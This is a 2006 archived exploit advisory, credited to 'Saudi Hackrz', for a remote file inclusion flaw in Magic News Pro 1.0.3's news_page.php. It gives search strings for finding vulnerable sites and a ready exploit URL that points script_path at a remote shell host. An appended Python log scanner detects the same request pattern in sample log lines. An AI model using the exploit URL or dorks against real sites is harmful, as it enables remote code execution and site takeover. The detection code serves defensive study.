Magic News Pro => 1.0.3 (script_path) Remote File Inclusion Exploit

2006-09-15T00:00:00
ID SECURITYVULNS:DOC:14290
Type securityvulns
Reporter Securityvulns
Modified 2006-09-15T00:00:00

Description

====================================================================

Magic News Pro => 1.0.3 (script_path) Remote File Inclusion Exploit

====================================================================

Critical Level : Dangerous

By Saudi Hackrz

http://www.reamdaysoft.com

http://www.reamdaysoft.com/magic-news-pro/overview.html

=================================================================

Script Name: Magic News Pro v 1.0.3

Script :) << $$

http://www.9q9q.net/up3/index.php?f=jMicDawzV

=================================================================

Bug in : news_page.php

include_once($script_path."/config.php");

in <<<< news/scripts/news_page.php

Search : "js-news.php?nr=" or "mgic news pro" or "js-news.php"

=================================================================

Exploit :

--------------------------------

http://sitename.com/news/scripts/news_page.php?script_path=http://SHELLURL.COM?

===============================================================================

Discovered By : Saudi Hackrz

Contact : Saudi.unix[at]hotmail.com

GreetZ : SnIpEr_Sa , KiNg18 , LeCoPrA And All My Friends :)

www.S3hr.com . www.elite-team.cc/vb .www.3asfh.net . www.lezr.com/vb .www.xp10.com

===============================================================================#
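
A defender-side check for the request pattern shown under "Exploit", as an added example that is not part of the original advisory or the vendor's code. It scans web access logs for requests to news_page.php that carry a script_path query parameter, on the assumption that legitimate requests never set it. The log lines, IP addresses and host names are constructed samples, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in common log format; IPs and hosts are reserved placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [15/Sep/2006:10:00:01 +0000] "GET /news/scripts/news_page.php?nr=5 HTTP/1.1" 200 5120
192.0.2.44 - - [15/Sep/2006:10:02:13 +0000] "GET /news/scripts/news_page.php?script_path=http://remote.example/x? HTTP/1.1" 200 312
192.0.2.44 - - [15/Sep/2006:10:02:40 +0000] "GET /news/scripts/news_page.php?script_path=hTTp%3A%2F%2Fremote.example%2Fx%3F HTTP/1.1" 200 312
192.0.2.51 - - [15/Sep/2006:10:05:00 +0000] "GET /news/js-news.php?nr=3 HTTP/1.1" 200 2048
192.0.2.60 - - [15/Sep/2006:10:07:09 +0000] "GET /news/scripts/news_page.php?script_path=../../tmp HTTP/1.1" 200 100
"""

REQUEST = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# A value starting with a URL scheme (http:, ftp:, php:, data:), "//" or a UNC
# prefix would make include_once() load content from outside the local tree.
REMOTE = re.compile(r'^(?:[a-z][a-z0-9+.\-]+:|//|\\\\)', re.IGNORECASE)

def classify(line):
    """Return (client_ip, verdict, decoded_value) for a suspicious request, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    # Only the file named in the advisory is checked here.
    if not url.path.lower().endswith("/news_page.php"):
        return None
    # parse_qsl percent-decodes once, as PHP does, so encoded schemes are caught.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name == "script_path":  # PHP variable names are case-sensitive
            verdict = "remote-include" if REMOTE.match(value.strip()) else "path-override"
            return (m.group("ip"), verdict, value)
    return None

def scan(log_text):
    """Classify every line of a log and keep only the hits."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Access logs record only the query string, so a script_path value delivered in a POST body or cookie would not show up in this scan.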